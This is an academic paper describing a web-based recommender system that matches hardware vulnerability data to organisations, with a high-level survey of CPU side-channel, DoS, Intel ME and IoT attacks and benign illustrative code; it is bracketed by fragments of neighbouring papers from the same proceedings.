33. Bilbro, G.L., Steer, M.B., Trew, R.J., et al.: Extraction of the parameters of equivalent circuits of microwave transistors using tree annealing. IEEE Trans. Microw. Theory Tech. 38(11), 1711–1718 (1990). https://doi.org/10.1109/22.60019
34. Xia, C.: Modeling and simulation analysis of RF passive devices based on microscope technology and new microwave circuits based on adjustable devices. Acta Microsc. 28(2), 271–280 (2019)
35. Semenov, A.O., Baraban, S.V., Osadchuk, O.V., Semenova, O.O., Koval, K.O., Savytskyi, A.Y.: Microelectronic pyroelectric measuring transducers. In: Tiginyanu, I., Sontea, V., Railean, S. (eds.) ICNBME 2019. IP, vol. 77, pp. 393–397. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-31866-6_72
36. Semenov, A., Osadchuk, O., Semenova, O., Koval, K., Baraban, S., Savytskyi, A.: A deterministic chaos ring oscillator based on a MOS transistor structure with negative differential resistance. In: 2019 IEEE International Scientific-Practical Conference Problems of Infocommunications, Science and Technology (PIC S&T), Kyiv, Ukraine, pp. 709–714 (2019). https://doi.org/10.1109/PICST47496.2019.9061330
37. Semenov, A.O., Savytskyi, A.Y., Bisikalo, O.V., Kulakov, P.I.: Mathematical modeling of the two-stage chaotic Colpitts oscillator. In: 2018 14th International Conference on Advanced Trends in Radioelectronics, Telecommunications and Computer Engineering (TCSET), Lviv-Slavske, Ukraine, pp. 835–839 (2018). https://doi.org/10.1109/TCSET.2018.8336327
Developing Security Recommender System Using Content-Based Filtering Mechanisms Maksim Iavich1 , Giorgi Iashvili1(B) , Roman Odarchenko2 , Sergiy Gnatyuk2 , and Avtandil Gagnidze3 1 Caucasus University, Paata Saakadze Str. 1, 0102 Tbilisi, Georgia
[email protected] 2 National Aviation University, Liubomyr Huzar Ave, 1, Kyiv 03058, Ukraine 3 East European University, Shatili Str. 4, 0178 Tbilisi, Georgia
Abstract. Machine learning and artificial intelligence are becoming more common today. They are used in a variety of areas, including the energy, medical, and financial sectors, to complete different tasks and assist in making key decisions. Among other uses, machine learning and artificial intelligence are used to build powerful recommender engines that provide users with recommendations in different directions, such as movie recommendations, friend suggestions in social networks, and much more. The goal of the scientific work offered by the authors of this research was to identify and understand the vulnerabilities of hardware-based systems and related mechanisms in order to improve the corresponding security measures. The main goal of the offered research is to design an upgraded recognition system and to identify the corresponding hardware-based vulnerabilities. Building on this research, the paper also aims to provide potential users with corresponding recommendations. This article discusses a web-based system that studies the potential security issues in hardware-based systems and provides optimal solutions. The system was tested using real-world cases from industrial and corporate organizations, and the assessment process demonstrates its ability to greatly enhance cybersecurity levels for various types of organizations. The research has resulted in a prototype of a web-based system that collects information about modern hardware-related vulnerabilities and provides users with appropriate recommendations based on a specific situation. Keywords: machine learning · content-based · vulnerability identification · web-based system
1 Introduction

Machine learning and artificial intelligence are becoming more common today. They are used in different areas, including the energy, medical, and financial sectors, to complete different tasks and assist in making key decisions. Among other uses, artificial intelligence and machine learning are needed to build powerful recommender engines that provide users with relevant recommendations in different directions, such as movie recommendations, friend suggestions in social networks, and much more. There are
a variety of ways and mechanisms in computer science that make use of the machine's central processing unit (CPU). The CPU's architecture is also crucial for the performance of cyber security processes. As a result, today's popular automation and encryption procedures rely on processor power to handle a variety of cyber security issues. Efficient cyber security mechanisms rely on proper algorithmic cores for their design and implementation. To create security algorithms that are both efficient and usable, various approaches are considered. One way to improve the efficiency and security of automation mechanisms is to allow the machine's central processing unit to work simultaneously on relevant software components and some aspects of the system. To optimize cyber security mechanisms, efficient usage of the CPU must take into account several factors. This scientific paper encompasses a wide range of research areas, such as the physical construction of the central processing unit, efficient processing of data, and techniques for transmitting data when communicating with software components or end users.

The paper is organized into multiple sections. The second section delves into security measures that are implemented at the central processing unit level. It examines modern attacks that target the central processing unit and discusses security mechanisms that are relevant to the Internet of Things. Moreover, the paper introduces a new recognition system for identifying hardware-based vulnerabilities and evaluates its practical performance. The final section outlines future plans for development and concludes the presented research.
2 Challenges of CPU

Addressing computational speed is a crucial aspect of cyber security. The processor's architecture plays a pivotal role in determining the data processing capabilities and, at times, the entire machine's functionality. Physical architectures of processors can result in limitations that cause incompatibilities with related systems, including security mechanisms. On the other hand, a well-designed central processing unit architecture enables the incorporation of new hardware into modern systems, such as microarchitectures and power-saving central processing units, allowing existing software to run on newer platforms. Unfortunately, hardware-oriented attacks are on the rise, and many hardware-based systems are susceptible to physical and side-channel attacks. Side-channel attacks occur when message and key inputs are observed, and even with standard cryptographic algorithms, cipher leakage can still occur due to hardware issues. Consequently, this study aims to analyze existing hardware-oriented attacks, calculate the data leakage caused by these attacks, and suggest techniques that can either mitigate or eliminate the leakage.
3 Literature Review

Hardware-based attack vectors are becoming increasingly prevalent nowadays. Successful modern attacks using various hardware-based techniques are analyzed in [1–3]. Even software implementations of different security mechanisms, including cryptographic
algorithms, are vulnerable to attacks such as side-channel attacks [4–7]. Modern security systems may also be vulnerable to attacks on the hardware, which can use different approaches [8–10]. New methods of hardware attacks are continuously being developed, including approaches that combine hardware and software to achieve better results during attacks. To this end, various malicious hardware is also being developed [11–13]. Research in the field of improving existing security mechanisms is ongoing, with authors offering new versions of the cryptosystems commonly used in practice [14–16]. However, much work remains to be done to achieve a sufficient level of security on the hardware side. One crucial field of modern cybersecurity is the IoT world, where new attack vectors against IoT devices are reported frequently [17–19].
4 The Role of CPU in Security

Many cryptographic modes of operation rely on the central processing unit's computational power to ensure system security. One such example is the Galois/Counter Mode (GCM) algorithm, which is used in various protocols such as IPsec, MACsec, TLS 1.2, and SSH for secure network communication. GCM utilizes the AES-NI instructions built into Intel Architecture Processors. Intel engineers are constantly improving GCM through micro-architectural and critical-path optimizations to enhance the efficiency of security mechanisms and adapt to a broader range of real-world scenarios.

Morpheus is another example of CPU usage in cybersecurity. The University of Michigan developed this new CPU architecture in 2019; it can block attacks by encrypting and randomly reshuffling key bits of its data and code twenty times per second. This processor architecture is faster than most automated hacking mechanisms and even faster than any human hacker. It can be used in various software and hardware platforms, including portable and IoT devices. Morpheus's focus is on protecting against control-flow integrity attacks such as buffer overflows. It randomizes the bits of data called undefined semantics, which are critical parts of the CPU architecture that deal with the format and content of programmed application code. While Morpheus cannot address all cybersecurity issues, it is suitable for developers and users interested in protecting against control-flow integrity attacks.
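To make the GCM mode discussed above concrete from the application side, the following minimal Python sketch encrypts and authenticates a message with AES-GCM via the widely used cryptography package. It illustrates the mode itself, not the AES-NI micro-architectural optimizations mentioned in the text.

```python
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

key = AESGCM.generate_key(bit_length=256)   # random 256-bit AES key
aesgcm = AESGCM(key)
nonce = os.urandom(12)                      # 96-bit nonce; never reuse with the same key

# GCM both encrypts the payload and authenticates it together with
# additional associated data (here, a protocol header).
ciphertext = aesgcm.encrypt(nonce, b"secret payload", b"protocol header")
plaintext = aesgcm.decrypt(nonce, ciphertext, b"protocol header")
assert plaintext == b"secret payload"
```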
5 Attack Vectors on CPU

Cyberattacks on computer systems and devices remain a significant problem despite the development of modern security mechanisms. Hackers continue to come up with creative and complicated methods to achieve their goals, which results in the creation of new attack vectors even against well-known organizations. DoS attacks and CPU side-channel attacks are two common types of attacks that target the central processing unit.

DoS (Denial of Service) attacks disrupt the normal operation of the CPU by consuming a significant amount of processing resources, resulting in decreased performance or a complete halt of the CPU. Attackers achieve this by keeping the processor's resources, such as registers, functional units, and logical units, in an active state, or by exploiting architectural vulnerabilities in the CPU using specialized malware components. For instance, hackers may gain control of multiple devices,
including IoT devices, to create a botnet that launches a massive number of malicious requests at the victim, effectively causing a DoS attack.

CPU side-channel attacks involve exploiting vulnerabilities in the physical implementation of cryptographic mechanisms to obtain sensitive information. These attacks leverage information leaked from the CPU's physical behavior, such as timing information, electromagnetic leaks, or power consumption. For example, attackers can use the CPU cache as a side channel to extract data from the processor's cache memory, allowing them to gain unauthorized access to critical data by extracting information from the memory of another active process in the system. A known vulnerability is the Rogue Data Cache Load exploit, which affects modern Intel processors and enables attackers to bypass security boundaries and read protected kernel memory from user processes. The ZombieLoad attack targets recent Intel processor versions and exploits microarchitectural data sampling vulnerabilities. This allows attackers to intercept future system commands through speculative execution, thereby gaining access to sensitive information stored in the CPU. To mitigate the risk of such attacks, manufacturers release patches and updates to address vulnerabilities as they are discovered. However, as attackers continue to develop new methods and exploit new vulnerabilities, it is crucial to remain vigilant and keep systems and devices updated with the latest security mechanisms.
Fig. 1. The side-channel attack in practice
It should be mentioned that a detailed description of the ZombieLoad attack is offered in research published in 2019. There it is argued that ZombieLoad is not a classical side-channel attack, but can instead be categorized as a data-sampling attack [2].

Nowadays, side-channel attacks on microcontroller software are also used very often. Figure 1 illustrates the process of such an attack, using the example of an attack on a software implementation of the Advanced Encryption Standard (AES). The goal of this attack is to obtain k* – the secret key of the encryption algorithm. The attacker can observe the input value p and the microcontroller's power consumption. The
encryption algorithm used in the process is known; the only unknown is the secret key k*. Given an input value p, the adversary can obtain the intermediate result z, which depends on p and on a part of k*. By analyzing the side-channel leakage of the intermediate result z, a hypothesis test can be performed on the values of the secret key. The leakage caused by the intermediate result can be written as a function of k*:

$$L(k^*) = f_{k^*}(p) + \varepsilon \quad (1)$$

The function $f_{k^*}$ depends on both the cryptographic algorithm and the hardware and software implementation methods. The error ε in the function is a random variable representing measurement errors and unrelated activities during the execution of the cryptographic algorithm [3]. As a result of this relationship, various side-channel attacks can be executed (a toy numeric sketch of this leakage model appears at the end of this section):

• In Differential Power Analysis (DPA), an attacker must use a portion of the key and conduct a test on the difference for $f_{k^*}(p)$ based on the value of the key segment that has been obtained.
• In Correlation Power Analysis (CPA), an attacker can use the linear correlation between $f_k$ and $L(k^*)$. During the attack, the attacker is able to extract multiple key bits simultaneously using CPA. However, this attack is sensitive to approximation errors that may be caused by $f_k$.
• In a Template Attack, the attacker utilizes the probability density function (pdf) of the $L(k)$ leakage for all possible keys, which requires an approximation of $f_k$ and the corresponding errors. With knowledge of this pdf, the attacker can select the key k* using Maximum Likelihood Approximation [4].
• Intel Management Engine – the Intel Management Engine (ME) is a dedicated microcontroller integrated into many central processing units produced by Intel Corporation. The Intel ME is used for different tasks in the system, such as out-of-band (OOB) administrative tasks, the Capability Licensing Service (CLS), Anti-Theft Protection, and the Protected Audio Video Path (PAVP). The Intel Management Engine runs its own lightweight operating system, which offers special commands and a simple interface.
• During attacks on central processing units, hackers use the operating system of the Intel Management Engine as a backdoor. Thus, during an attack on the Intel Management Engine, the hacker can load and execute malicious code that is hidden from the user and from the security mechanisms of the operating system. Such an attack may cause instability of the entire computer system, and even cause it to crash. Furthermore, many critical vulnerabilities have been found in the Intel Management Engine, and patching them requires an update of
the firmware. This must be done on the manufacturer's side, which means that many outdated systems do not receive the proper updates and remain vulnerable.

The IoT ecosystem is a significant area of research and development in the modern cyber world. The use of smart devices has experienced substantial growth in recent years, enabling technical and repetitive tasks such as data collection and sorting, as well as sending and receiving notifications. In complex industrial settings, IoT-based smart systems are being used to automate vehicle assembly processes in modern car factories. Interestingly, the concept of a smart home has evolved from merely automating different processes to solving practical problems with a broader scope, such as reducing natural resource usage. However, with the increase in the usage of smart devices worldwide, the risk of cyberattacks targeting IoT-based computing environments has also grown. Cyber attackers are increasingly able to adapt to various software and hardware configurations of targeted devices. Most attacks target data centers that control devices belonging to one or more networks. IoT devices are vulnerable to cyberattacks, which can be categorized based on their nature. Attackers can gain access to smart devices through outdated software or hardware managed by special firmware. Hardware vulnerabilities are harder to detect and fix than software flaws, making it necessary to comprehensively analyze existing hardware security measures for modern devices and develop new approaches to increase understanding of existing security issues and improve hardware security mechanisms. Based on our research, potential attacks on IoT devices can be grouped into the following categories [9–11]:

• Physical attacks. The primary objective of the hacker is to carry out a successful attack, although the methods used may vary. These attacks require direct contact with the IoT device and typically result in broken hardware due to various physical factors. Additionally, IoT devices located outside buildings are rather vulnerable to physical attacks.
• Reconnaissance attacks. In these attacks on IoT devices, hackers do not perform any unauthorized manipulations on the system or network. Instead, the attacks involve port scanning, packet sniffing, and analysis of network traffic.
• Distributed Denial-of-Service (DDoS) attacks. These are the most common type of attack, typically carried out using infected devices (botnets) to target a specific system. The goal of such attacks is to flood the targeted system with large amounts of illegitimate requests, rendering it unavailable.
• Access attacks. These refer to unauthorized access gained by hackers to certain networks or devices. They can be executed either physically, by accessing the system, or remotely, with the latter being less risky for the attacker and therefore more commonly used.
• Privacy attacks. These pose a significant challenge in the context of IoT, primarily because of the vast amount of information that is easily accessible through remote access channels. Data mining and cyber espionage are common attacks that compromise privacy.
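To make the leakage model of Eq. (1) concrete, the following toy Python simulation generates noisy Hamming-weight leakage L(k*) = HW(p XOR k*) + ε for known plaintext bytes and recovers the key byte by correlating key hypotheses against the traces, in the spirit of the CPA attack described above. This is a deliberately simplified sketch with illustrative parameters; real attacks typically target a nonlinear step such as the AES S-box output.

```python
import numpy as np

rng = np.random.default_rng(0)
true_key = 0x3C                      # the secret k* the attacker wants
n_traces = 2000

hw = np.array([bin(x).count("1") for x in range(256)])  # Hamming weight table

# Known random plaintext bytes p and simulated measurements:
# L(k*) = f_{k*}(p) + eps, with f modeled as HW(p XOR k*).
p = rng.integers(0, 256, n_traces)
traces = hw[p ^ true_key] + rng.normal(0.0, 1.0, n_traces)

# CPA: correlate the hypothesized leakage for every key guess with the
# measured traces (signed correlation, so the complement key scores low).
scores = [np.corrcoef(hw[p ^ k], traces)[0, 1] for k in range(256)]
best = int(np.argmax(scores))
print(f"recovered key byte: {best:#04x}")   # expected: 0x3c
```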
6 The Experiment Results

Preventing attacks on devices that contain and transmit confidential information is crucial, particularly in larger organizations with prevalent hardware infrastructure issues. The ability to remotely execute hardware-based attacks poses a significant threat to many systems, making hardware a critical research area in cybersecurity that demands attention from both end users and manufacturers [12]. Accurate management of processes that rely on specialized hardware, such as IoT-based systems that control industrial machines or manage stores, is vital. Establishing a standard security mechanism that applies to any modern hardware-oriented system is a complex process, and manufacturers use existing standards to build microchips and hardware components that are primarily managed by dedicated software [13]. This software can be designed for a specific system or a group of systems, and manufacturers typically use various dedicated cores, which are a combination of hardware and software, to manage specific systems. External hardware or software components are often used to hack the system in potential attack models [14] (Fig. 2).
Fig. 2. Interactive form on the platform
Our research team has developed a web-based application capable of checking the hardware of various devices, including classic, industrial, office, and IoT devices. This recognition system is freely available and utilizes a trusted resources list stored in its database to assess the devices. The database contains information from well-known online vulnerability detection and indication platforms such as AttackerKB, ExploitDB, CVE MITRE, and National Vulnerability Database. The system is based on the most
relevant information from these sources and stores data related to new hardware-based attack vectors, new vulnerabilities in existing products, and security issues in outdated firmware versions. Users can enter specific search queries to obtain detailed information on existing security issues in the target product, along with recommendations for increasing its level of security.
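As an illustration of how such trusted sources can be queried programmatically, the sketch below pulls keyword-matched CVE entries from the public NVD REST API (v2.0). The helper name and field selection are our own illustrative choices, not the actual implementation of the described platform.

```python
import requests

NVD_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"

def fetch_cves(keyword: str, limit: int = 5) -> list:
    """Return (CVE id, description) pairs whose text matches the keyword."""
    resp = requests.get(
        NVD_URL,
        params={"keywordSearch": keyword, "resultsPerPage": limit},
        timeout=30,
    )
    resp.raise_for_status()
    results = []
    for item in resp.json().get("vulnerabilities", []):
        cve = item["cve"]
        results.append((cve["id"], cve["descriptions"][0]["value"]))
    return results

for cve_id, summary in fetch_cves("Intel Management Engine"):
    print(cve_id, "-", summary[:80])
```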
Fig. 3. Popular search queries
Together with the queries and trends from well-known vulnerability and cyber security databases, the system collects information about internal cases based on the different search queries performed by its users. Figure 3 illustrates some popular search queries within the platform, which the system stores in its local database. For better tracking of user behavior on the platform, the input form is available only to authorized users. Each user has a personal profile with specific statistical data (Fig. 4).
Fig. 4. Authorization form
As can be seen in Fig. 5, based on the search form input the user receives a recommendation with separate components, such as the number of employees, the server configuration, and the number of machines in the organization. Together with the component fields, users are provided with a detailed recommendation based on the content. The system also gives the user useful links to popular security-related resources based on the industry/category and the geographic scope of the user's organization (Fig. 6). This approach also uses machine learning elements to make the final recommendations more relevant; a minimal sketch of the content-based matching step appears at the end of this section. Each user of the system has a personal rating and an individual list of search
Fig. 5. Concrete search query result
Fig. 6. Useful links provided by the system
queries that help the platform work more accurately. The data from the user's profile is extremely helpful at the recommendation generation stage.

The system works by gathering information about the specific hardware used in the product being tested. As side-channel attacks are common on hardware, the system is designed to analyze the leakage of the intermediate result z. Since the leakage caused by z can be represented as a function of the key value k*, the system can evaluate the potential level of leakage using the corresponding parameters and an independent noise variable ε. To collect information about hardware-based issues, the system relies on trusted sources. After collecting the data, the system generates relevant recommendations and prioritizes them based on criteria such as relevancy, date of indication, spread, general information, and risk level. By considering these factors, the system provides the user with the most practical and useful recommendation for the particular issue. The data collected is based on common attacks on hardware in several categories, including office equipment, industrial devices, IoT devices, and classical devices used by average users. Figure 7 shows the results of the corresponding analysis.

Fig. 7. Types of attacks in different directions

Based on the analysis results, it can be concluded that the type and frequency of attacks vary depending on the industry, use case context, and usage scope of each device. Due to the diverse nature of hardware-based attacks, it is not feasible to create a universal security mechanism that can be applied to all devices. Therefore, each device or hardware-based system must be analyzed independently, taking into consideration its technical specifications, implementation architecture, vendor,
and firmware versions. This approach is necessary to develop a customized security mechanism that is effective in preventing attacks on the particular device or system.
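A minimal sketch of the content-based matching step is shown below: vulnerability advisories and the user's situation are embedded as TF-IDF vectors and ranked by cosine similarity. The advisory texts and the query are made up for illustration; the paper's actual scoring additionally weighs relevancy, date of indication, spread, and risk level, as described above.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Illustrative knowledge base (in the real system, entries come from
# sources such as NVD, ExploitDB, AttackerKB, and CVE MITRE).
advisories = [
    "Speculative execution side-channel leak in desktop CPU microcode",
    "Default credentials in IoT camera firmware allow remote access",
    "DMA attack on office printer exposes protected kernel memory",
]

# Query assembled from the user's search form (device type, configuration, ...)
query = "IoT device firmware remote access vulnerability"

vectorizer = TfidfVectorizer(stop_words="english")
doc_matrix = vectorizer.fit_transform(advisories)
query_vec = vectorizer.transform([query])
scores = cosine_similarity(query_vec, doc_matrix).ravel()

# Recommend advisories ranked by similarity to the user's situation.
for idx in scores.argsort()[::-1]:
    print(f"{scores[idx]:.2f}  {advisories[idx]}")
```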
7 User-Oriented Approaches

Together with security mechanisms, the usability of a user-oriented system is also a very important issue. To create a comfortable and understandable system, the components of human-computer interaction (HCI) must be considered and implemented in the final product. HCI can be considered a multidisciplinary topic of research that focuses on the design of computer technology and, specifically, on the interaction between humans (users) and computers. The field of human-computer interaction originated with computers, but it has since expanded to encompass almost all aspects of information technology design. HCI components are now used in nearly every user-oriented system to enhance the user experience and make it more comfortable and understandable. HCI is the subject of a great deal of academic research, and those who study and work in this field consider it a critical tool for promoting the idea that computer-user interaction should resemble an open-ended discourse between humans (Fig. 8).

Initially, HCI researchers focused on enhancing the usability of desktop computers. However, with the widespread availability of new technologies such as the Internet and smartphones, computer use is shifting toward mobile devices. HCI is a broad field that intersects with various areas, including user-centered design (UCD), user interface (UI) design, and user experience (UX) design. Despite this overlap, there are some distinctions between HCI and UX design. HCI practitioners tend to be more academically oriented and participate in scientific research and the development of empirical user understandings. UX designers, on the other hand, are primarily focused on industry and involved in creating products or services, such as smartphone apps and websites. While UX designers have access to a wealth of materials thanks to the vast range of issues covered by HCI, much of the research is still geared toward academic audiences.
Fig. 8. Human-computer interaction components
Designers, on the other hand, do not have the luxury of time that HCI professionals do. As a result, they must go beyond industry-imposed limitations in order to gain access to these more academic insights. A system designed with this in mind can harness critical insights to create the best designs for its users.

The concept of usability was and continues to be the primary technical focus of HCI. The phrase "simple to learn, easy to use" first expressed this concept in a somewhat simplistic way. This conceptualization's raw simplicity gave HCI an edgy and strong character in computing. It served to bring the field together and to help it have a larger and more effective impact on computer science and technology development. However, within the field of human-computer interaction, the concept of usability has been rearticulated and reconstructed on a near-constant basis, becoming increasingly rich and intriguingly challenging. Fun, well-being, social efficacy, aesthetic tension, enhanced creativity, flow, support for human development, and other attributes are now frequently grouped together under usability. A more dynamic perspective treats usability as a programmatic goal that should and will evolve as our ability to reach toward it improves.

7.1 HCI and Recommender Systems

Researchers have recognized in recent years that the effectiveness of recommender systems extends beyond recommendation accuracy. As a result, there has been a surge of interest in human factors research, such as merging interactive visualization techniques with recommendation algorithms to improve transparency and controllability in the recommendation process. Interaction emphasizes user involvement through discourse with the technology, whereas visualization relies on visual representations to aid human perception [15].
As mentioned, usability is one of the most important components of the user experience, and a user-oriented system with a high level of security must be developed following the best usability practices. From the user's perspective, usability measures can be divided into the following components:

• Speed – a metric for determining how quickly a user can complete a task. The faster a task is completed in the system, the higher the speed.
• Efficiency – measured by the number of errors committed by the user while completing the task.
• Learnability – how easy it is for the user to learn how to use the system.
• User feedback – what users like most in the system.
• Memorability – how easily the user remembers how to operate the system after a period of not using it.

It is possible to achieve a good level of usability for some of the mentioned components, but not for all of them, because for any user-oriented system security must be taken into account as well: a more secure system generally means a decreased level of usability.

There are different methods to measure each component of usability. To measure the speed of the system, the measurement is time; to measure efficiency, errors are counted. For learnability, memorability, and user preferences, the situation is different. When assessing learnability, we frequently consider how long it takes a user to learn to use a system. Consider a chart that shows how long it takes a user to log in, with a sequence of successive log-in attempts running along the bottom. The initial log-in may take five seconds, the second four seconds, the third three seconds, and so on, until the log-in time levels out towards the end. Such a chart displays how long it takes people to learn something and conveys an understanding of the learning curve. We may have a system that behaves like this, but we could also have a system where many log-in attempts take a long time before something clicks and the users are able to finish the task quickly. Figure 9 illustrates the measurement of learnability.

To test memorability, we can start the same way and then wait a long time before having the user return to the system, observing how long it takes them to log in. It could take a long time, indicating poor memorability, or they could log in as quickly as they did the last time they used the system, indicating that the system is easily remembered. It is likely that we will obtain a value somewhere in the middle, where users may require a bit more time to re-acquaint themselves with the system after an extended pause, while hopefully not reverting to the proficiency level they had when they first learned to use it.

Finally, we want to determine user preference. This is done with questionnaires, surveys, and interviews. There are various standard questionnaires and surveys for gauging user preference across a variety of systems; these let users rank items on a scale. Conducting interviews, in which you sit down with people while they are using the system and have them explain what they like and dislike, can provide much more information about their preferences.
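As a small illustration of this measurement, the sketch below takes a series of log-in durations, mirroring the chart described above, and reports the attempt after which improvement levels off. The numbers and the tolerance threshold are illustrative assumptions.

```python
# Hypothetical log-in durations (seconds) over successive attempts.
durations = [5.0, 4.0, 3.0, 2.2, 2.1, 2.0]

def plateau_attempt(times, tol=0.15):
    """First attempt index after which each improvement stays below tol seconds."""
    for i in range(1, len(times)):
        if all(times[j - 1] - times[j] < tol for j in range(i, len(times))):
            return i
    return len(times)

print("learning curve levels out after attempt", plateau_attempt(durations))  # 4
```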
Fig. 9. Measuring learnability
8 Discussion

Throughout our research, we conducted tests on various devices and hardware-oriented software platforms owned by different organizations. The testing phase lasted four months, during which the participating organizations tested their systems once a month to provide us with the data required to monitor improvements in the security level. The presented system was used to test devices that are used daily in various organizations for different purposes. The enrolled organizations provided us with data that generated an extensive list of recommendations, summarized in Fig. 10. The data collected pertained to three categories of cybersecurity issues: hardware problems, configuration problems, and expired firmware. The analysis revealed that the most frequent security problem was improper hardware configuration, which could lead to serious issues in the future. Accordingly, recommendations were provided to the affected organizations. The system's logic core prioritized the determination of optimal recommendations that could resolve existing problems, while also accounting for relevant system updates and possible future variations. Based on practical performance assessments, regular use of the system was found to have a positive impact on the security level of the organizations concerned [16, 17]. The system has been tested and assessed using data generated by various European institutions that adhere to GDPR rules. In most cases, the system successfully addressed the detected issues.

While standard cryptographic algorithms are considered secure against classical computer attacks, hardware-based side-channel attacks remain a major challenge in computer science. The system presented in this paper offers a solution to this problem. The modern hardware-based vulnerability recognition system uses a new approach to analyze the problem based on a concrete scenario, drawing on well-known hardware vulnerability databases while considering the state of the analyzed system.
Fig. 10. Testing period of the system
Various hardware-based attacks are today successfully performed even on well-known systems in the business, education, and financial spheres. This makes the modern recommendation system unique and suited to the particular situation. It means that, based on the provided approach, many organizations working in different directions can close the security gaps in their hardware-based systems and consequently increase their security level [18–20]. The methods used in the recommendation system are based on practical analysis approaches and popular databases. This makes the recommendations relevant and useful for end users as well as for organizations.
9 Conclusions

Given the importance of hardware-based systems in many businesses' day-to-day operations, enhancing device security methods is a vital component of system maintenance. As a result, we intend to enhance the security issue identification system's capability by providing options that allow users to select their user level. The system must then choose the appropriate technique to tackle the existing security problem of the hardware-based system based on the user's specified skill level, increasing the applicability of such a method to solve cybersecurity concerns in a wider variety of businesses. Furthermore, the algorithmic core will be supplemented with the necessary machine learning aspects in order to improve the usefulness of the reports generated by the system, as well as the end users' overall experience. Specific analysis procedures will examine the data in the database, taking freshly input data into account as well, combine the existing data, and eventually add the necessary extra data to the database. By integrating new data sources based on popular end-user searches, this technique will effectively enhance the relevance of the recommendations.
The aim of the research presented in this paper was to identify the vulnerabilities of hardware-based devices and the associated software systems in order to enhance the required security mechanisms. The involvement of the user in this process makes the calibration of the security mechanism more effective. Improving the education of end users regarding security issues can increase the likelihood of detecting such issues and identifying appropriate solutions. The developed software system will assist end users in comprehending the source and structure of security issues [21, 22], enabling them to take appropriate action. As attack strategies are continuously evolving, the system can assist users in adopting optimal mitigation strategies. Additionally, the system is suitable for securing the hardware-based infrastructure of larger organizations, ensuring compliance with stringent regulations such as the European General Data Protection Regulation, and effective implementation in practice.

Acknowledgement. This work was supported by Shota Rustaveli National Foundation of Georgia (SRNSFG) [NFR-22-14060].
References

1. Wang, X., Li, Z., Yang, Y.: Deep learning based side-channel analysis: a survey. IEEE Access 8, 202671–202694 (2020). https://doi.org/10.1109/access.2020.3031811
2. Bhunia, S., Hsiao, M.S., Narasimhan, S.: Hardware Trojan attacks: threat analysis and countermeasures. Proc. IEEE 102(8), 1229–1247 (2014). https://doi.org/10.1109/JPROC.2014.2334493
3. Moradi, A., Kuhn, M.G., Paar, C.: Hash function design strategies for counteracting side-channel attacks. IACR Trans. Cryptogr. Hardw. Embed. Syst. 2011(4), 87–108 (2011). https://doi.org/10.1007/978-3-642-23822-2_6
4. Abomhara, M., Køien, G.M.: Cyber security and the internet of things: vulnerabilities, threats, intruders and attacks. J. Cyber Secur. Mobil. 4(1), 65–68 (2015)
5. Wang, H., Forte, D., Tehranipoor, M.M., Shi, Q.: Probing attacks on integrated circuits: challenges and research opportunities. IEEE Des. Test 34(5), 63–71 (2017). https://doi.org/10.1109/MDAT.2017.2729398
6. Page, D.: Theoretical use of cache memory as a cryptanalytic side-channel. IACR Cryptology ePrint Archive, vol. 169, pp. 170–184 (2002)
7. Samer, M., Fayez, G., Aaron, G.T.: Hardware attacks: an algebraic approach. J. Cryptogr. Eng. 6, 325–337 (2016). https://doi.org/10.1007/s13389-016-0117-6
8. Samer, M., Gebali, F., Gulliver, T., et al.: Hardware attack risk assessment. In: ICCES (2015). https://doi.org/10.1109/ICCES.2015.7393073
9. Imani, M., Shirani-Mehr, H., Naderi, H., Tehranipoor, M.: A survey of hardware Trojan taxonomy and detection. IEEE Des. Test 36(1), 55–73 (2019). https://doi.org/10.1109/MDAT.2018.2871403
10. Austin, T.: Hardware security: an overview of the state of the art. IEEE Secur. Priv. 13(4), 24–29 (2015). https://doi.org/10.1109/MSP.2015.78
11. Huang, Z., Wang, Q., Chen, Y., Jiang, X.: A survey on machine learning against hardware Trojan attacks: recent advances and challenges. IEEE Access 8, 10796–10826 (2020). https://doi.org/10.1109/ACCESS.2020.2965016
12. Iavich, M., Iashvili, G., Gagnidze, A., et al.: Lattice based Merkle. In: IVUS 2019, Kaunas, 25 April 2019: Proceedings. CEUR-WS, vol. 2470, pp. 13–16 (2019)
13. Calero Valdez, A., Ziefle, M., Verbert, K.: HCI for recommender systems: the past, the present and the future. In: Proceedings of the 10th ACM Conference on Recommender Systems (RecSys 2016), pp. 123–126. Association for Computing Machinery, New York (2016). https://doi.org/10.1145/2959100.2959158
14. Bhunia, S., Abramovici, M., Agrawal, D., et al.: Protection against hardware Trojan attacks: towards a comprehensive solution. IEEE Des. Test 30, 6–17 (2013)
15. Gagnidze, A., Iavich, M., Iashvili, G.: Novel version of Merkle cryptosystem. Bull. Georgian Natl. Acad. Sci. 11(4), 28–33 (2017)
16. Nawir, M., Amir, A., Yaakob, N., Lynn, O.B.: Internet of things (IoT): taxonomy of security attacks. In: 2016 3rd International Conference on Electronic Design (ICED), Phuket, Thailand, pp. 321–326 (2016). https://doi.org/10.1109/ICED.2016.7804660
17. Ronen, E., Shamir, A.: Extended functionality attacks on IoT devices: the case of smart lights. In: European Symposium on Security and Privacy, Saarbrücken, 21–24 March 2016: Proceedings, pp. 3–12. IEEE (2016)
18. Iashvili, G., Iavich, M., Gagnidze, A., Gnatyuk, S.: Increasing usability of TLS certificate generation process using secure design. In: CEUR Workshop Proceedings, vol. 2698, pp. 35–41 (2020)
19. Gao, P., et al.: Enabling efficient cyber threat hunting with cyber threat intelligence. In: 2021 IEEE 37th International Conference on Data Engineering (ICDE), Chania, Greece, pp. 193–204 (2021). https://doi.org/10.1109/ICDE51399.2021.00024
20. Iavich, M., Gnatyuk, S., Odarchenko, R., Bocu, R., Simonov, S.: The novel system of attacks detection in 5G. In: Barolli, L., Woungang, I., Enokido, T. (eds.) AINA 2021. LNNS, vol. 226, pp. 580–591. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-75075-6_47
Analysis of Airtime Fairness Technology Application for Fair Allocation of Time Resources for IEEE 802.11 Networks

Liubov Tokar(B) and Yana Krasnozheniuk
Kharkiv National University of Radio Electronics, 14 Nauky Ave., Kharkiv, Ukraine {liubov.tokar,yana.krasnozheniuk}@nure.ua
